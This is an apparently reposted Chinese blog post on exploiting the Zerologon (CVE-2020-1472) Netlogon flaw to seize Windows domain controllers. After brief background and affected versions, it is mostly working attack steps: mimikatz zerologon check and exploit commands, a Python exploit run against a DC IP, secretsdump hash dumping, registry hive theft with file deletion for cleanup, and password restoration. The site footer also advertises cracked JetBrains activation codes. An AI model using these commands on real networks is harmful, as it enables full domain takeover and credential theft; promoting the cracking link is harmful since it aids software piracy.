域渗透之Zerologon域提权漏洞

域渗透之Zerologon域提权漏洞组件概述Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之Zerologon域提权漏洞

组件概述

Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制器(BDC)复制数据库。

Netlogon远程协议用于维护从域成员到域控制器(DC),域的DC之间以及跨域的DC之间的域关系。此RPC接口用于发现和管理这些关系。

漏洞概述

该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。

漏洞范围

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

影响Windows Server 2008R 2至Windows Server 2019的多个版本系统

漏洞复现

privilege::debug

# 检测是否存在漏洞
lsadump::zerologon /target:<dc-ip> /account:<主机名>$

# 重置密码
lsadump::zerologon /target:<dc-ip> /account:<主机名>$ /exploit

或使用脚本

python3 cve-2020-1472-exploit.py -n server2012 -t 10.211.55.12

-n指定域控计算机主机名

-t指定域控ip

运行exp,确定把域控机器账户密码置换成空

完成后使用

python secretsdump.py 域名/ADD-DC$@192.168.11.15 -no-pass

拖hash,获取域管hash后使用psexec等进行pth登录

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

# 获取文件路径
get system.saveget sam.save
get security.save 

# 删除文件
del /f system.save
del /f sam.save
del /f security.save

解密本地凭据

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

域渗透之Zerologon域提权漏洞

$MACHINE.ACC: 的值,然后使用reinstall_original_pw.py进行还原凭据

python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca

机器名可通过nslookup 或nbtscan等netbios扫描获取

参考

CVE-2020-1472 Netlogon权限提升漏洞分析

CVE-2020-1472 Zerologon

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119829.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • java激活码-激活码分享

    (java激活码)本文适用于JetBrains家族所有ide,包括IntelliJidea,phpstorm,webstorm,pycharm,datagrip等。https://javaforall.net/100143.htmlIntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,上面是详细链接哦~B…

    2022年3月22日
    287
  • pycharm如何设置背景为自己的图片_扣扣空间背景图片怎么设置

    pycharm如何设置背景为自己的图片_扣扣空间背景图片怎么设置pycharm的背景很单调,喜欢花里胡哨的朋友们看这里啦~操作步骤可以设置自己看着舒服的透明度和喜欢的图片学会了吗赶紧去试试吧!

    2022年8月26日
    7
  • eclipse导入maven工程,右键没有build path和工程不能自动编译解决方法

    eclipse导入maven工程,右键没有build path和工程不能自动编译解决方法原文链接:https://blog.csdn.net/wusunshine/article/details/52506389eclipse导入maven工程,右键没有buildpath解决方法:由于.project文件缺少<natures><nature>org.eclipse.jdt.core.javanature</nature&gt…

    2022年5月31日
    47
  • java scanner输入数组_java基础- scanner/方法/数组

    java scanner输入数组_java基础- scanner/方法/数组1.用户交互scannerNext()publicclassdemo1{publicstaticvoidmain(String[]args){//创建一个scanner对象Scannerscanner=newScanner(System.in);System.out.println(“请使用next方式进行接收:”);//判断有无输入字符if(scanner.hasNext…

    2022年6月26日
    81
  • UART协议详解

    UART使用的是异步,串行通信。   串行通信是指利用一条传输线将资料一位位地顺序传送。特点是通信线路简单,利用简单的线缆就可实现通信,降低成本,适用于远距离通信,但传输速度慢的应用场合。   异步通信以一个字符为传输单位,通信中两个字符间的时间间隔多少是不固定的,然而在同一个字符中的两个相邻位间的时间间隔是固定的。    数据传送速率用波特率来表示,即每秒钟传送的二进制位数。例如数据传送…

    2022年4月4日
    88
  • varchar2和varchar的区别[通俗易懂]

    varchar2和varchar的区别[通俗易懂]1.varchar2把所有字符都占两字节处理(一般情况下),varchar只对汉字和全角等字符占两字节,数字,英文字符等都是一个字节;2.VARCHAR2把空串等同于null处理,而varchar仍按照空串处理;3.VARCHAR2字符要用几个字节存储,要看数据库使用的字符集,大部分情况下建议使用varchar2类型,可以保证更好的兼容性…

    2022年6月15日
    35

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号